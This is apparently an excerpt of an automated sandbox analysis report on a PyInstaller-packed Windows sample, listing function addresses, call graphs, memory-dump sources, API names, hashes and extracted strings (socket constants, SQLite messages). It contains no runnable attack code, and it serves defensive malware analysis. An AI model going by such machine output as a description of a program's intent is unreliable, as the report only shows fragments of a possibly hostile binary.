_fread_nolock 53 API calls 102512->102518 102514 7ff7c26612cf __std_exception_copy 102514->102491 102515 7ff7c26613cf 102536 7ff7c2662710 54 API calls _log10_special 102515->102536 102518->102512 102518->102514 102518->102515 102519 7ff7c2670180 37 API calls 102518->102519 102527 7ff7c2670b4c 102518->102527 102519->102518 102520->102474 102521->102479 102522->102491 102523->102485 102524->102491 102525->102495 102526->102491 102528 7ff7c2670b7c 
102527->102528 102537 7ff7c267089c 102528->102537 102530 7ff7c2670b9a 102530->102518 102531->102503 102532->102507 102533->102514 102534->102511 102535->102514 102536->102514 102538 7ff7c26708bc 102537->102538 102543 7ff7c26708e9 102537->102543 102539 7ff7c26708c6 102538->102539 102540 7ff7c26708f1 102538->102540 102538->102543 102551 7ff7c267a884 37 API calls 2 library calls 102539->102551 102544 7ff7c26707dc 102540->102544 102543->102530 102552 7ff7c26754dc EnterCriticalSection 102544->102552 102546 7ff7c26707f9 102547 7ff7c267081c 74 API calls 102546->102547 102548 7ff7c2670802 102547->102548 102549 7ff7c26754e8 _fread_nolock LeaveCriticalSection 102548->102549 102550 7ff7c267080d 102549->102550 102550->102543 102551->102543 102554 7ff7c2674a4e 102553->102554 102555 7ff7c2674a73 102554->102555 102557 7ff7c2674aaf 102554->102557 102571 7ff7c267a884 37 API calls 2 library calls 102555->102571 102572 7ff7c2672c80 49 API calls _invalid_parameter_noinfo 102557->102572 102559 7ff7c2674a9d 102561 7ff7c266c5c0 _log10_special 8 API calls 102559->102561 102560 7ff7c2674b46 102563 7ff7c2674b8c 102560->102563 102565 7ff7c2674b61 102560->102565 102566 7ff7c2674bb0 102560->102566 102569 7ff7c2674b58 102560->102569 102564 7ff7c2661cc8 102561->102564 102575 7ff7c267a9b8 11 API calls 2 library calls 102563->102575 102564->101972 102573 7ff7c267a9b8 11 API calls 2 library calls 102565->102573 102566->102563 102567 7ff7c2674bba 102566->102567 102574 7ff7c267a9b8 11 API calls 2 library calls 102567->102574 102569->102563 102569->102565 102571->102559 102572->102560 102573->102559 102574->102559 102575->102559 102577 7ff7c2675f38 102576->102577 102578 7ff7c2675f5e 102577->102578 102580 7ff7c2675f91 102577->102580 102607 7ff7c2674f78 11 API calls _get_daylight 102578->102607 102583 7ff7c2675f97 102580->102583 102584 7ff7c2675fa4 102580->102584 102581 7ff7c2675f63 102608 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102581->102608 102609 7ff7c2674f78 11 API calls _get_daylight 
102583->102609 102595 7ff7c267ac98 102584->102595 102585 7ff7c2664606 102585->102222 102589 7ff7c2675fb8 102610 7ff7c2674f78 11 API calls _get_daylight 102589->102610 102590 7ff7c2675fc5 102602 7ff7c267ff3c 102590->102602 102593 7ff7c2675fd8 102611 7ff7c26754e8 LeaveCriticalSection 102593->102611 102612 7ff7c2680348 EnterCriticalSection 102595->102612 102597 7ff7c267acaf 102598 7ff7c267ad0c 19 API calls 102597->102598 102599 7ff7c267acba 102598->102599 102600 7ff7c26803a8 _isindst LeaveCriticalSection 102599->102600 102601 7ff7c2675fae 102600->102601 102601->102589 102601->102590 102613 7ff7c267fc38 102602->102613 102605 7ff7c267ff96 102605->102593 102607->102581 102608->102585 102609->102585 102610->102585 102617 7ff7c267fc73 __vcrt_FlsAlloc 102613->102617 102615 7ff7c267ff11 102632 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102615->102632 102623 7ff7c267fe3a 102617->102623 102628 7ff7c2677aac 51 API calls 3 library calls 102617->102628 102618 7ff7c267fe43 102618->102605 102625 7ff7c2686dc4 102618->102625 102620 7ff7c267fea5 102620->102623 102629 7ff7c2677aac 51 API calls 3 library calls 102620->102629 102622 7ff7c267fec4 102622->102623 102630 7ff7c2677aac 51 API calls 3 library calls 102622->102630 102623->102618 102631 7ff7c2674f78 11 API calls _get_daylight 102623->102631 102633 7ff7c26863c4 102625->102633 102628->102620 102629->102622 102630->102623 102631->102615 102632->102618 102634 7ff7c26863db 102633->102634 102635 7ff7c26863f9 102633->102635 102687 7ff7c2674f78 11 API calls _get_daylight 102634->102687 102635->102634 102637 7ff7c2686415 102635->102637 102644 7ff7c26869d4 102637->102644 102638 7ff7c26863e0 102688 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102638->102688 102642 7ff7c26863ec 102642->102605 102690 7ff7c2686708 102644->102690 102647 7ff7c2686a49 102722 7ff7c2674f58 11 API calls _get_daylight 102647->102722 102648 7ff7c2686a61 102710 7ff7c2678590 102648->102710 102652 7ff7c2686a4e 102723 7ff7c2674f78 11 API calls 
_get_daylight 102652->102723 102680 7ff7c2686440 102680->102642 102689 7ff7c2678568 LeaveCriticalSection 102680->102689 102687->102638 102688->102642 102691 7ff7c2686734 102690->102691 102698 7ff7c268674e 102690->102698 102691->102698 102735 7ff7c2674f78 11 API calls _get_daylight 102691->102735 102693 7ff7c2686743 102736 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102693->102736 102695 7ff7c268681d 102706 7ff7c268687a 102695->102706 102741 7ff7c2679be8 37 API calls 2 library calls 102695->102741 102696 7ff7c26867cc 102696->102695 102739 7ff7c2674f78 11 API calls _get_daylight 102696->102739 102698->102696 102737 7ff7c2674f78 11 API calls _get_daylight 102698->102737 102700 7ff7c2686876 102703 7ff7c26868f8 102700->102703 102700->102706 102702 7ff7c2686812 102740 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102702->102740 102742 7ff7c267a970 17 API calls __FrameHandler3::FrameUnwindToEmptyState 102703->102742 102704 7ff7c26867c1 102738 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102704->102738 102706->102647 102706->102648 102743 7ff7c2680348 EnterCriticalSection 102710->102743 102722->102652 102723->102680 102735->102693 102736->102698 102737->102704 102738->102696 102739->102702 102740->102695 102741->102700 102745 7ff7c2677968 102744->102745 102748 7ff7c2677444 102745->102748 102747 7ff7c2677981 102747->102232 102749 7ff7c267748e 102748->102749 102750 7ff7c267745f 102748->102750 102758 7ff7c26754dc EnterCriticalSection 102749->102758 102759 7ff7c267a884 37 API calls 2 library calls 102750->102759 102753 7ff7c267747f 102753->102747 102754 7ff7c2677493 102755 7ff7c26774b0 38 API calls 102754->102755 102756 7ff7c267749f 102755->102756 102757 7ff7c26754e8 _fread_nolock LeaveCriticalSection 102756->102757 102757->102753 102759->102753 102761 7ff7c266feb3 102760->102761 102764 7ff7c266fee1 102760->102764 102771 7ff7c267a884 37 API calls 2 library calls 102761->102771 102763 7ff7c266fed3 102763->102236 102764->102763 102770 7ff7c26754dc 
EnterCriticalSection 102764->102770 102766 7ff7c266fef8 102767 7ff7c266ff14 72 API calls 102766->102767 102768 7ff7c266ff04 102767->102768 102769 7ff7c26754e8 _fread_nolock LeaveCriticalSection 102768->102769 102769->102763 102771->102763 102772->102253 102774 7ffb0c042250 102778 7ffb0c0422ab new[] 102774->102778 102775 7ffb0c152900 4 API calls 102776 7ffb0c0423e1 102775->102776 102780 7ffb0c0423fd 00007FFB1C263010 102778->102780 102782 7ffb0c042408 new[] 102778->102782 102784 7ffb0c0423c4 102778->102784 102779 7ffb0c042665 102783 7ffb0c0426de 102779->102783 102785 7ffb0c02d9e0 16 API calls 102779->102785 102780->102782 102782->102783 102782->102784 102786 7ffb0c0392b0 102782->102786 102783->102784 102800 7ffb0c038a10 26 API calls 102783->102800 102784->102775 102785->102783 102787 7ffb0c039335 102786->102787 102789 7ffb0c03948d new[] 102786->102789 102788 7ffb0c03934e new[] 102787->102788 102787->102789 102792 7ffb0c039375 00007FFB1C263010 102788->102792 102798 7ffb0c0395c2 102788->102798 102790 7ffb0c039390 new[] 102789->102790 102789->102798 102814 7ffb0c0e5ae0 9 API calls 102789->102814 102791 7ffb0c039455 00007FFB1C263010 102790->102791 102796 7ffb0c039679 102790->102796 102790->102798 102793 7ffb0c03962b 102791->102793 102794 7ffb0c039477 00007FFB1C263010 102791->102794 102792->102790 102795 7ffb0c03962e 00007FFB1C263010 00007FFB1C263010 102793->102795 102794->102795 102795->102796 102796->102798 102801 7ffb0c02ffd0 102796->102801 102798->102779 102800->102784 102808 7ffb0c030021 102801->102808 102803 7ffb0c152900 4 API calls 102804 7ffb0c030647 102803->102804 102804->102798 102805 7ffb0c0301f0 CreateFileW 102805->102808 102808->102805 102809 7ffb0c030475 102808->102809 102811 7ffb0c0303a8 102808->102811 102815 7ffb0c02fa10 15 API calls new[] 102808->102815 102816 7ffb0c030800 13 API calls 102808->102816 102817 7ffb0c029340 9 API calls 102808->102817 102818 7ffb0c02d810 13 API calls 102809->102818 102811->102803 102812 7ffb0c0304a0 102819 7ffb0c0e5ae0 9 API 
calls 102812->102819 102814->102790 102815->102808 102816->102808 102817->102808 102818->102812 102819->102811 102820 7ffb0c1a8f9e 102821 7ffb0c1a9003 102820->102821 102822 7ffb0c1a8fdd 102820->102822 102822->102821 102824 7ffb0c1a4640 102822->102824 102825 7ffb0c1a468b 102824->102825 102828 7ffb0c1a4a43 102824->102828 102826 7ffb0c1a46dc 00007FFB0C2F805C 102825->102826 102825->102828 102829 7ffb0c1a46f0 102825->102829 102826->102828 102826->102829 102836 7ffb0c1ab510 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 102828->102836 102829->102828 102832 7ffb0c1a4880 00007FFB0C058F60 102829->102832 102834 7ffb0c1a4c29 00007FFB0C058F60 102829->102834 102835 7ffb0c1a5700 00007FFB0C2F805C 102829->102835 102837 7ffb0c1a69bc 00007FFB2ADB6A30 00007FFB2ADB6A30 00007FFB2ADB6A30 00007FFB2ADB6A30 102829->102837 102830 7ffb0c1a4b46 102830->102821 102832->102829 102834->102829 102835->102829 102836->102830 102837->102829 102838 7ffb1ba45338 102839 7ffb1ba4538d 102838->102839 102840 7ffb1ba4534f 102838->102840 102841 7ffb1ba45362 closesocket 102840->102841 102842 7ffb1ba45379 102841->102842 102842->102839 102843 7ffb1ba45382 00007FFB2ADA3440 102842->102843 102843->102839 102844 7ffb0c05fa16 102845 7ffb0c05fa49 102844->102845 102846 7ffb0c05fa34 102844->102846 102867 7ffb0c045d50 102845->102867 102886 7ffb0c066990 19 API calls 102846->102886 102851 7ffb0c05fa40 102854 7ffb0c061f25 102851->102854 102887 7ffb0c029340 9 API calls 102851->102887 102853 7ffb0c06251b 102889 7ffb0c029340 9 API calls 102853->102889 102854->102853 102888 7ffb0c051e20 9 API calls 102854->102888 102857 7ffb0c062566 102858 7ffb0c062577 102857->102858 102890 7ffb0c0554a0 36 API calls 102857->102890 102860 7ffb0c062588 102858->102860 102891 7ffb0c026c40 9 API calls 102858->102891 102863 7ffb0c062034 102860->102863 102892 7ffb0c081280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 102860->102892 102864 7ffb0c152900 4 
API calls 102863->102864 102866 7ffb0c062067 102863->102866 102865 7ffb0c062643 102864->102865 102871 7ffb0c045e25 102867->102871 102872 7ffb0c045d77 102867->102872 102868 7ffb0c045e2a 102868->102851 102879 7ffb0c045f40 102868->102879 102870 7ffb0c045efc 102904 7ffb0c029340 9 API calls 102870->102904 102871->102868 102893 7ffb0c041f10 102871->102893 102872->102868 102872->102870 102874 7ffb0c045d7d 102872->102874 102874->102868 102875 7ffb0c045ed3 102874->102875 102876 7ffb0c045ec7 102874->102876 102903 7ffb0c045b40 19 API calls 102875->102903 102902 7ffb0c0e5aa0 9 API calls 102876->102902 102881 7ffb0c045f63 102879->102881 102880 7ffb0c0460b0 102880->102851 102881->102880 102882 7ffb0c0460c8 102881->102882 102883 7ffb0c041f10 19 API calls 102881->102883 102907 7ffb0c029340 9 API calls 102881->102907 102908 7ffb0c029340 9 API calls 102882->102908 102883->102881 102886->102851 102887->102854 102888->102853 102889->102857 102890->102858 102891->102860 102892->102863 102894 7ffb0c041f2d 102893->102894 102895 7ffb0c041f74 102893->102895 102905 7ffb0c029340 9 API calls 102894->102905 102901 7ffb0c03a0d0 19 API calls 102895->102901 102897 7ffb0c041f5e 102897->102872 102898 7ffb0c041f85 102900 7ffb0c041f89 102898->102900 102906 7ffb0c041be0 9 API calls 102898->102906 102900->102872 102901->102898 102902->102868 102903->102868 102904->102868 102905->102897 102906->102900 102907->102881 102908->102880 102918 7ffb1ba46e1c 102919 7ffb1ba46e2f 102918->102919 102920 7ffb1ba46e4c 102919->102920 102922 7ffb1ba446b0 102919->102922 102928 7ffb1ba49548 102922->102928 102924 7ffb1ba446ca ioctlsocket 102925 7ffb1ba44700 102924->102925 102927 7ffb1ba446f6 102924->102927 102926 7ffb1ba44706 WSAGetLastError 102925->102926 102926->102927 102927->102920 102929 7ffb1ba4954f 102928->102929 102930 7ffb1ba4599c 102934 7ffb1ba459d6 102930->102934 102932 7ffb1ba45ad4 102961 7ffb1ba42a00 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 102932->102961 
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
• Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
Similarity
• API ID: ConditionMask$00007InfoStartupVerifyVersion
• String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
• API String ID: 2428397897-1188461360
• Opcode ID: f3ee92442da01c5675d5574538c33161c2b68c1f843b35255a2c0a6b2ee3d7ac
• Instruction ID: 42e90f81162037b2f6f4411b2fc32ef9e0300506fe2d52dbb5dd2952bc8df6c0
• Opcode Fuzzy Hash: f3ee92442da01c5675d5574538c33161c2b68c1f843b35255a2c0a6b2ee3d7ac
• Instruction Fuzzy Hash: D0D2CBA0F38F1349F6188B36E8542651A56FF45BE1F88F239C90E8A674EF6DE119C341

Control-flow Graph (rendered graph data omitted)
Strings
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
• Instruction ID: a126fb637c7a3bb1d0b2850f1203ae32a2a722ba97f7b845208a13040d220de5
• Opcode Fuzzy Hash: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
• Instruction Fuzzy Hash: 13328021A0868291FB14BF2194543B9A673AF55BA4FC44032DACD63BD6DFBCE568C334

Control-flow Graph (rendered graph data omitted)
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: -journal$immutable$nolock
• API String ID: 3122504284-4201244970
• Opcode ID: a1f561667bbe6322790191b89becdf0bea67dc52a5ba2455568e19f1d4293569
• Instruction ID: 53c8c0319c4ce794d61d3b2637a2eb71b9fe32fbb3f3f86bd7636842b432a36e
• Opcode Fuzzy Hash: a1f561667bbe6322790191b89becdf0bea67dc52a5ba2455568e19f1d4293569
• Instruction Fuzzy Hash: 5C329CE2A09B8286EB259F35D448B7827A5FF44BA4F484234DA6E077D4EF7CE455C308
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
• API String ID: 3122504284-509082904
• Opcode ID: bc0f1b3d37c7c14db3c6a3fb4993dfbb8ccb39d95472aa5842e03a8855881612
• Instruction ID: 5de30785aa94ebabfe42c2dbddb2cf50a1c5d0f066451331ead2f7a04ad961d6
• Opcode Fuzzy Hash: bc0f1b3d37c7c14db3c6a3fb4993dfbb8ccb39d95472aa5842e03a8855881612
• Instruction Fuzzy Hash: F012ACE2A4DB8285EB549F35E458BB967A1FF80B88F584031DE5E076A4EF3CE445C308
Control-flow Graph
                                                                                                                                                                                                                                                                    control_flow_graph 2213 7ff7c26869d4-7ff7c2686a47 call 7ff7c2686708 2216 7ff7c2686a49-7ff7c2686a52 call 7ff7c2674f58 2213->2216 2217 7ff7c2686a61-7ff7c2686a6b call 7ff7c2678590 2213->2217 2222 7ff7c2686a55-7ff7c2686a5c call 7ff7c2674f78 2216->2222 2223 7ff7c2686a6d-7ff7c2686a84 call 7ff7c2674f58 call 7ff7c2674f78 2217->2223 2224 7ff7c2686a86-7ff7c2686aef CreateFileW 2217->2224 2236 7ff7c2686da2-7ff7c2686dc2 2222->2236 2223->2222 2227 7ff7c2686b6c-7ff7c2686b77 GetFileType 2224->2227 2228 7ff7c2686af1-7ff7c2686af7 2224->2228 2230 7ff7c2686bca-7ff7c2686bd1 2227->2230 2231 7ff7c2686b79-7ff7c2686bb4 GetLastError call 7ff7c2674eec CloseHandle 2227->2231 2233 7ff7c2686b39-7ff7c2686b67 GetLastError call 7ff7c2674eec 2228->2233 2234 7ff7c2686af9-7ff7c2686afd 2228->2234 2239 7ff7c2686bd9-7ff7c2686bdc 2230->2239 2240 7ff7c2686bd3-7ff7c2686bd7 2230->2240 2231->2222 2247 7ff7c2686bba-7ff7c2686bc5 call 7ff7c2674f78 2231->2247 2233->2222 2234->2233 2241 7ff7c2686aff-7ff7c2686b37 CreateFileW 2234->2241 2245 7ff7c2686be2-7ff7c2686c37 call 7ff7c26784a8 2239->2245 2246 7ff7c2686bde 2239->2246 2240->2245 2241->2227 2241->2233 2251 7ff7c2686c39-7ff7c2686c45 call 7ff7c2686910 2245->2251 2252 7ff7c2686c56-7ff7c2686c87 call 7ff7c2686488 2245->2252 2246->2245 2247->2222 2251->2252 2258 7ff7c2686c47 2251->2258 2259 7ff7c2686c8d-7ff7c2686ccf 2252->2259 2260 7ff7c2686c89-7ff7c2686c8b 2252->2260 2261 7ff7c2686c49-7ff7c2686c51 call 7ff7c267ab30 2258->2261 2262 7ff7c2686cf1-7ff7c2686cfc 2259->2262 2263 7ff7c2686cd1-7ff7c2686cd5 2259->2263 2260->2261 2261->2236 2266 7ff7c2686d02-7ff7c2686d06 2262->2266 2267 7ff7c2686da0 2262->2267 2263->2262 2265 7ff7c2686cd7-7ff7c2686cec 2263->2265 2265->2262 2266->2267 2268 7ff7c2686d0c-7ff7c2686d51 
CloseHandle CreateFileW 2266->2268 2267->2236 2270 7ff7c2686d86-7ff7c2686d9b 2268->2270 2271 7ff7c2686d53-7ff7c2686d81 GetLastError call 7ff7c2674eec call 7ff7c26786d0 2268->2271 2270->2267 2271->2270
APIs
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction ID: bf498a22dbfba0db295f622562c6cd6d45920bef7404c585b36de946709df130
• Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction Fuzzy Hash: 7CC1C232B28A41C5EB10EFA5D4906AC7762F749BA8B414235DFAEA7BD4CF78D451C320
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: database schema is locked: %s$out of memory$statement too long
• API String ID: 3122504284-1046679716
• Opcode ID: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
• Instruction ID: 6fca25d5a31b20f676f460eff6547f2c613bb216fc1bd7df5a41cd4d8343d8cf
• Opcode Fuzzy Hash: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
